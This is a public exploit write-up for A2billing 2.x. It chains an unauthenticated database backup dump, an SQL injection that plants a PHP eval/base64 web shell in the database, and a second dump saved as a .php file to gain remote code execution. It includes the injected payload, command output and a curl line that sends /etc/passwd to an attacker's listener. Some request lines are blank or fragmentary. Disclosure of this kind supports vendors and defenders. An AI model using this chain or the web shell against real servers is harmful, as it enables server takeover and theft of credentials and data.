A2billing 2.x - Backup File Download / Remote Code Execution

2017-09-04 18:05:16

# Title : A2billing 2.x , Unauthenticated Backup dump / RCE flaw
# Vulnerable software : A2billing 2.x
# Author : Ahmed Sultan (0x4148)
# Email : <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="2010581411141860474d41494c0e434f4d">[email protected]</a>
# Home : 0x4148.com
# Linkedin : https://www.linkedin.com/in/0x4148/

A2billing contain multiple flaws which can be chained together to achieve shell access over the a2b instance

If you're looking for deep technical stuff , check out the full writeup at https://0x4148.com/2016/10/28/a2billing-rce/

1 . backup dump
Vulnerable code
File : admin/public/form_data/FG_var_backup.inc

$HD_Form = new FormHandler("cc_backup","Backup");

$HD_Form -> FG_DEBUG = 0;

if ($form_action!='ask-add')

if ($form_action == 'add'){
$backup_file = $path;

if (substr($backup_file,-3)=='.gz'){
$backup_file = substr($backup_file,0,-3);
// Make the backup stuff here and redirect to success page
//mysqldump -all --databases mya2billing -ua2billinguser
-pa2billing > /tmp/test.sql
//pg_dump -c -d -U a2billinguser -h localhost -f /tmp/test.sql

if (DB_TYPE != 'postgres'){
$run_backup=MYSQLDUMP." -all --databases ".DBNAME." -u'".USER."'
-p'".PASS."' > '{$backup_file}'";
$run_backup=PG_DUMP." -c -d -U ".USER." -h ".HOST." -f '{$backup_file}'
if ($FG_DEBUG == 1 ) echo $run_backup."<br>";
>>>> exec($run_backup,$output,$error);
if ($do_gzip){
// Compress file
$run_gzip = GZIP_EXE." '$backup_file'";
if ($FG_DEBUG == 1 ) echo $run_gzip."<br>";
>>>> exec($run_gzip,$output,$error_zip);

File is being called at "admin/Public/A2B_entity_backup.php" before the authentication checking proccess take place so to dump full backup we can just move to :
backup will be found at admin/Public/0x4148.sql

few hardening is being carried out by the application which did great job preventing direct RCE flaw , so we had to figure out sth else

2 . SQL injection
File name : ckeckout_process.php
Line 287 : $Query = "INSERT INTO cc_payments_agent ( agent_id, agent_name,
agent_email_address, item_name, item_id, item_quantity, payment_method,
cc_type, cc_owner, cc_number, " .
" cc_expires, orders_status, last_modified, date_purchased,
orders_date_finished, orders_amount, currency, currency_value) values (" .
" '".$transaction_data[0][1]."', '".$customer_info[3]."
".$customer_info[2]."', '".$customer_info["email"]."', 'balance', '".
$customer_info[0]."', 1, '$pmodule',
'".$_SESSION["p_cardtype"]."', '".$transaction_data[0][5]."',
'".$transaction_data[0][6]."', '".
$transaction_data[0][7]."', $orderStatus, '".$nowDate."',
'".$nowDate."', '".$nowDate."', ".$amount_paid.", '".$currCurrency."', '".
$currencyObject->get_value($currCurrency)."' )";
$result = $DBHandle_max -> Execute($Query);

By exploiting this flaw we can insert malicious data into the db using the following query <thanks to i-Hmx for the great hint>
transactionID=456789111111 unise//**lecton selinse//**rtect
After sending this request the following payload "<?php
eval(base64_decode($_POST[nailit])); ?>" will be injected directly into the

3 . RCE
after injecting the malicious code we can just dump backup again but this time we will name it "0x4148.php" , so our code can be executed :)

[<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="6e1c01011a2e02010d0f0206011d1a">[email protected]</a> Public]# curl '' --insecure
[<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="cab8a5a5be8aa6a5a9aba6a2a5b9be">[email protected]</a> Public]# cat 0x4148.php | grep nailit
INSERT INTO `cc_payments_agent` VALUES (295,2,'
10:57:10','2016-10-28 10:57:10','2016-10-28
eval(base64_decode($_POST[nailit])); ?>','7','8',-1,'3.000000','2016-10-28
10:58:22','2016-10-28 10:58:22','2016-10-28 10:58:22','usd','0.000000');

Now just exploit it via post nailit=base64_encoded php code to admin/Public/0x4148.php for instance system(‘x=$(cat /etc/passwd);curl -d “$x”
http://x.x.x.x:8000/0x4148.jnk’); will read /etc/passwd and send it to our nc listener

Exploit timeline :
01/10/2016 : vulnerability reported to vendor
06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP
04/09/2017 : Public release

Ahmed Sultan - Cyber Security Analyst @ EG-CERT<script>!function(e,t,r,n,c,h,o){function a(e,t,r,n){for(r='',n='0x'+e.substr(t,2)|0,t+=2;t<e.length;t+=2)r+=String.fromCharCode('0x'+e.substr(t,2)^n);return r}try{for(c=e.getElementsByTagName('a'),o='/cdn-cgi/l/email-protection#',n=0;n<c.length;n++)try{(t=(h=c[n]).href.indexOf(o))>-1&&(h.href='mailto:'+a(h.href,t+o.length))}catch(e){}for(c=e.querySelectorAll('.__cf_email__'),n=0;n<c.length;n++)try{(h=c[n]).parentNode.replaceChild(e.createTextNode(a(h.getAttribute('data-cfemail'),0)),h)}catch(e){}}catch(e){}}(document);</script>


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